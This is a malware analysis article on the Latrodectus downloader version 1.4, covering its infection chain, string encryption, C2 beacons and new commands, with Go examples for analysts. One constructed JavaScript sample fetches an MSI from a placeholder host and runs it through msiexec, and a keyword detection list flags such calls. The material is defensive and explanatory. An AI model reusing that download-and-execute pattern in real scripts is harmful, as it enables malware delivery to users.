A new version of the Latrodectus downloader has been observed with enhanced capabilities and additional evasion techniques. Initially discovered by Walmart in October 2023, Latrodectus has gained notoriety for its similarities with the infamous IcedID malware.
This article delves into the new features of Latrodectus version 1.4, its delivery mechanisms, and the implications for cybersecurity.
Latrodectus, a downloader malware, was first identified in late 2023. It quickly became a subject of interest due to its code and infrastructure similarities with IcedID, as reported by cybersecurity firms Proofpoint and Team Cymru S2.
The malware is primarily disseminated through email spam campaigns run by two threat actors, TA577 and TA578. In July 2024 it was also observed being delivered by a Brute Ratel C4 (BRC4) badger, indicating that its distribution methods are evolving.
New Features in Latrodectus Version 1.4
The latest version of Latrodectus, version 1.4, introduces several updates that enhance its malicious capabilities. These include a new string deobfuscation approach, a revised command and control (C2) endpoint, and two additional backdoor commands.
These updates signify a strategic enhancement to improve the malware’s effectiveness and evasion capabilities.
JavaScript File Analysis
The infection chain begins with a heavily obfuscated JavaScript file. The obfuscation technique involves inserting numerous comments to increase file size and complexity, making analysis challenging.
The script extracts and executes the code embedded between these comments, which then downloads an MSI file from a remote server and installs it.
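The padding-comment trick is cheap to triage: strip the comment lines and look at what remains, and note how little of the file is actual code. The Go helper below is an added example, not the Netskope analysis or the dropper's own code. It assumes the padding consists of plain `//` line comments (the real sample's marker may differ), the embedded script is constructed for the example, and the 50% comment threshold and keyword list are assumptions a practitioner would tune.

```go
package main

import (
	"bufio"
	"fmt"
	"strings"
)

// Constructed sample standing in for a padded dropper: most lines are
// filler comments, the few real statements are buried among them.
const sampleJS = `// 8f3a1c...
// 77b2...
var a = "h" + "ttp://";
// 9e0d...
// filler
var b = a + "example.invalid/payload.msi";
// filler
new ActiveXObject("WScript.Shell").Run("msiexec /i " + b);
// trailing filler
`

type triage struct {
	Total    int      // non-blank lines
	Comments int      // lines that are only a // comment
	Code     []string // everything else, in file order
}

// splitComments classifies each non-blank line: a leading "//" marks
// padding, anything else is candidate code kept in order.
func splitComments(src string) triage {
	var t triage
	sc := bufio.NewScanner(strings.NewReader(src))
	for sc.Scan() {
		line := strings.TrimSpace(sc.Text())
		if line == "" {
			continue
		}
		t.Total++
		if strings.HasPrefix(line, "//") {
			t.Comments++
			continue
		}
		t.Code = append(t.Code, line)
	}
	return t
}

// commentRatio is the fraction of non-blank lines that are comments.
func (t triage) commentRatio() float64 {
	if t.Total == 0 {
		return 0
	}
	return float64(t.Comments) / float64(t.Total)
}

// suspicious flags a file where padding dominates and the surviving code
// reaches for a script host or the MSI installer. Thresholds are assumptions.
func (t triage) suspicious() bool {
	joined := strings.ToLower(strings.Join(t.Code, "\n"))
	return t.commentRatio() > 0.5 &&
		(strings.Contains(joined, "msiexec") || strings.Contains(joined, "wscript.shell"))
}

func main() {
	t := splitComments(sampleJS)
	fmt.Printf("%d lines, %d comments (%.0f%%)\n", t.Total, t.Comments, 100*t.commentRatio())
	for _, l := range t.Code {
		fmt.Println("code:", l)
	}
	fmt.Println("suspicious:", t.suspicious())
}
```

Run against a real sample, the ratio alone is a useful first signal; legitimate scripts rarely consist mostly of comment lines, and the few statements left over are what to hand to a sandbox or read by hand.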
MSI File and Crypter Analysis
Upon execution, the MSI uses the Windows utility rundll32.exe to load a DLL named “nvidia.dll” and call its exported “AnselEnableCheck” function. The DLL is stored within a CAB file embedded in the MSI.
The DLL is protected with a crypter named Dave, a tool previously used by other malware families such as Emotet and BlackBasta. The crypter’s stub decrypts the embedded Latrodectus payload, which is then executed to carry out the malicious activity.
Enhanced Evasion Techniques
String Obfuscation
A notable change in version 1.4 is the adoption of AES-256 in CTR mode for string obfuscation, replacing the simple XOR used by earlier versions.
The strings are encrypted with a hardcoded AES key and a different initialization vector (IV) for each string, so an analyst has to recover the key from the sample and locate each string’s IV before the string table can be decrypted; the extra work is modest once the key is known, but it defeats the trivial XOR recovery that worked before.
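To make the change concrete, the following Go program is an added example, not code from the sample or from Netskope. It decrypts a string table of the kind described above, using a hardcoded AES-256 key and a per-string IV; the key, the strings and the record layout (16-byte IV, 2-byte little-endian length, ciphertext) are assumptions constructed for the example. It also shows why per-string IVs matter for CTR: with a repeated IV, XORing two ciphertexts cancels the keystream and leaks the XOR of the plaintexts without any key.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"encoding/binary"
	"errors"
	"fmt"
)

// Hardcoded AES-256 key as an analyst would lift it from the unpacked
// sample. Constructed for this example; it is not the real key.
var stringKey = []byte("0123456789abcdef0123456789abcdef")

// Record layout assumed here (the article does not document it):
// 16-byte IV | 2-byte little-endian length | ciphertext.
const hdrLen = 16 + 2

func ctr(key, iv []byte) cipher.Stream {
	block, err := aes.NewCipher(key)
	if err != nil {
		panic(err) // only reachable with a key of the wrong size
	}
	return cipher.NewCTR(block, iv)
}

// encryptString builds one record; used only to construct sample data.
func encryptString(key, iv []byte, plain string) []byte {
	ct := make([]byte, len(plain))
	ctr(key, iv).XORKeyStream(ct, []byte(plain))
	rec := make([]byte, hdrLen, hdrLen+len(ct))
	copy(rec, iv)
	binary.LittleEndian.PutUint16(rec[16:], uint16(len(ct)))
	return append(rec, ct...)
}

// decryptRecord recovers one string and reports the bytes consumed.
func decryptRecord(key, buf []byte) (string, int, error) {
	if len(buf) < hdrLen {
		return "", 0, errors.New("record shorter than header")
	}
	n := int(binary.LittleEndian.Uint16(buf[16:hdrLen]))
	if len(buf) < hdrLen+n {
		return "", 0, errors.New("truncated ciphertext")
	}
	out := make([]byte, n)
	ctr(key, buf[:16]).XORKeyStream(out, buf[hdrLen:hdrLen+n])
	return string(out), hdrLen + n, nil
}

// decryptTable walks a concatenated table of records.
func decryptTable(key, table []byte) ([]string, error) {
	var out []string
	for len(table) > 0 {
		s, used, err := decryptRecord(key, table)
		if err != nil {
			return out, err
		}
		out = append(out, s)
		table = table[used:]
	}
	return out, nil
}

// xorBytes returns a XOR b. With CTR and a reused IV this cancels the
// keystream and leaves plaintext1 XOR plaintext2 without the key.
func xorBytes(a, b []byte) []byte {
	n := len(a)
	if len(b) < n {
		n = len(b)
	}
	out := make([]byte, n)
	for i := range out {
		out[i] = a[i] ^ b[i]
	}
	return out
}

// sampleTable is constructed input: three strings, each with its own IV.
func sampleTable() []byte {
	var t []byte
	for i, p := range []string{"/test", "rundll32.exe", "%AppData%"} {
		iv := make([]byte, 16)
		iv[15] = byte(i + 1) // distinct IV per string
		t = append(t, encryptString(stringKey, iv, p)...)
	}
	return t
}

func main() {
	strs, err := decryptTable(stringKey, sampleTable())
	fmt.Println(strs, err)
	iv := make([]byte, 16) // same IV for two strings: the failure mode
	c1 := encryptString(stringKey, iv, "AAAAA")[hdrLen:]
	c2 := encryptString(stringKey, iv, "BBBBB")[hdrLen:]
	fmt.Printf("%x\n", xorBytes(c1, c2)) // 0303030303
}
```

The truncation check in decryptRecord matters in practice: a string table carved from a partial memory dump will end mid-record, and a decryptor that trusts the length field will read past the buffer. The IV-reuse demonstration is the reason the per-string IV is not just an annoyance for analysts; it is what keeps the scheme from leaking plaintext relationships outright.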
C2 Communication
Latrodectus collects system information, including the username, OS version and MAC address, encrypts it with RC4 and sends it to the C2 server.
The new version posts to a “/test” endpoint, which suggests the developers are still testing and refining this release.
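Because RC4 is a symmetric stream cipher and the key is fixed in the binary, recovering that key from a sample lets an analyst decrypt captured registration traffic with the same call that encrypted it. The Go program below is an added example, not the malware’s code or Netskope’s: the key, the field names and the URL-encoded layout of the beacon are assumptions constructed for the example.

```go
package main

import (
	"crypto/rc4"
	"fmt"
	"net/url"
)

// Key as it would be recovered from the sample; constructed for this example.
var c2Key = []byte("example-rc4-key")

// buildBeacon assembles the system-information fields. The URL-encoded
// key=value layout is an assumption for the example, not the real format.
func buildBeacon(user, osVer, mac string) string {
	v := url.Values{}
	v.Set("user", user)
	v.Set("os", osVer)
	v.Set("mac", mac)
	return v.Encode()
}

// rc4Apply encrypts or decrypts: RC4 XORs a keystream over the data, so the
// same operation with the same key performs both directions.
func rc4Apply(key, data []byte) ([]byte, error) {
	c, err := rc4.NewCipher(key) // rejects keys outside 1..256 bytes
	if err != nil {
		return nil, err
	}
	out := make([]byte, len(data))
	c.XORKeyStream(out, data)
	return out, nil
}

// decodeBeacon is what an analyst holding the key runs over a captured POST body.
func decodeBeacon(key, body []byte) (map[string]string, error) {
	plain, err := rc4Apply(key, body)
	if err != nil {
		return nil, err
	}
	vals, err := url.ParseQuery(string(plain))
	if err != nil {
		return nil, err
	}
	out := make(map[string]string, len(vals))
	for k := range vals {
		out[k] = vals.Get(k)
	}
	return out, nil
}

func main() {
	// Bot side: build and encrypt the beacon (constructed values).
	body, _ := rc4Apply(c2Key, []byte(buildBeacon("analyst", "10.0.19045", "00:11:22:33:44:55")))
	fmt.Printf("wire: %x\n", body)
	// Analyst side: decrypt with the recovered key.
	fields, err := decodeBeacon(c2Key, body)
	fmt.Println(fields, err)
	// A wrong key yields garbage, not an error you can rely on.
	bad, err := decodeBeacon([]byte("wrong"), body)
	fmt.Println("wrong key recovers user:", bad["user"] == "analyst", err)
}
```

The practical consequence for detection is that RC4 offers the operators no authentication or integrity; anyone who extracts the key, whether from the unpacked DLL or from the memory of an infected host, can read and forge registration traffic. Note also that a wrong key does not reliably produce an error, so a decryptor should validate the decoded fields rather than trust a successful parse.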
New Command Capabilities
Version 1.4 introduces two new commands to its arsenal, enhancing its operational flexibility:
- Command 0x16: downloads shellcode from a server specified in the command and executes it; a base64 encoding function is involved in handling the command’s parameter.
- Command 0x19: downloads a file to the %AppData% directory, staging additional payloads on the host.
These additions expand Latrodectus’s capabilities, enabling more complex and targeted attacks.
Detection and Mitigation
Netskope Threat Protection has identified Latrodectus under several threat signatures, including Gen:Variant.Ulise.493872 and Trojan.Generic.36724146.
Their advanced threat protection solutions provide proactive coverage against this evolving threat, helping organizations safeguard their systems.
The rapid evolution of Latrodectus underscores the dynamic nature of cyber threats and the continuous need for vigilance and adaptation in cybersecurity defenses.
The malware’s enhanced capabilities and sophisticated evasion techniques pose significant challenges to security professionals. Understanding these updates is crucial for developing effective detection and mitigation strategies.
Netskope Threat Labs and other cybersecurity entities remain committed to monitoring Latrodectus’s development and providing timely insights to combat its threat.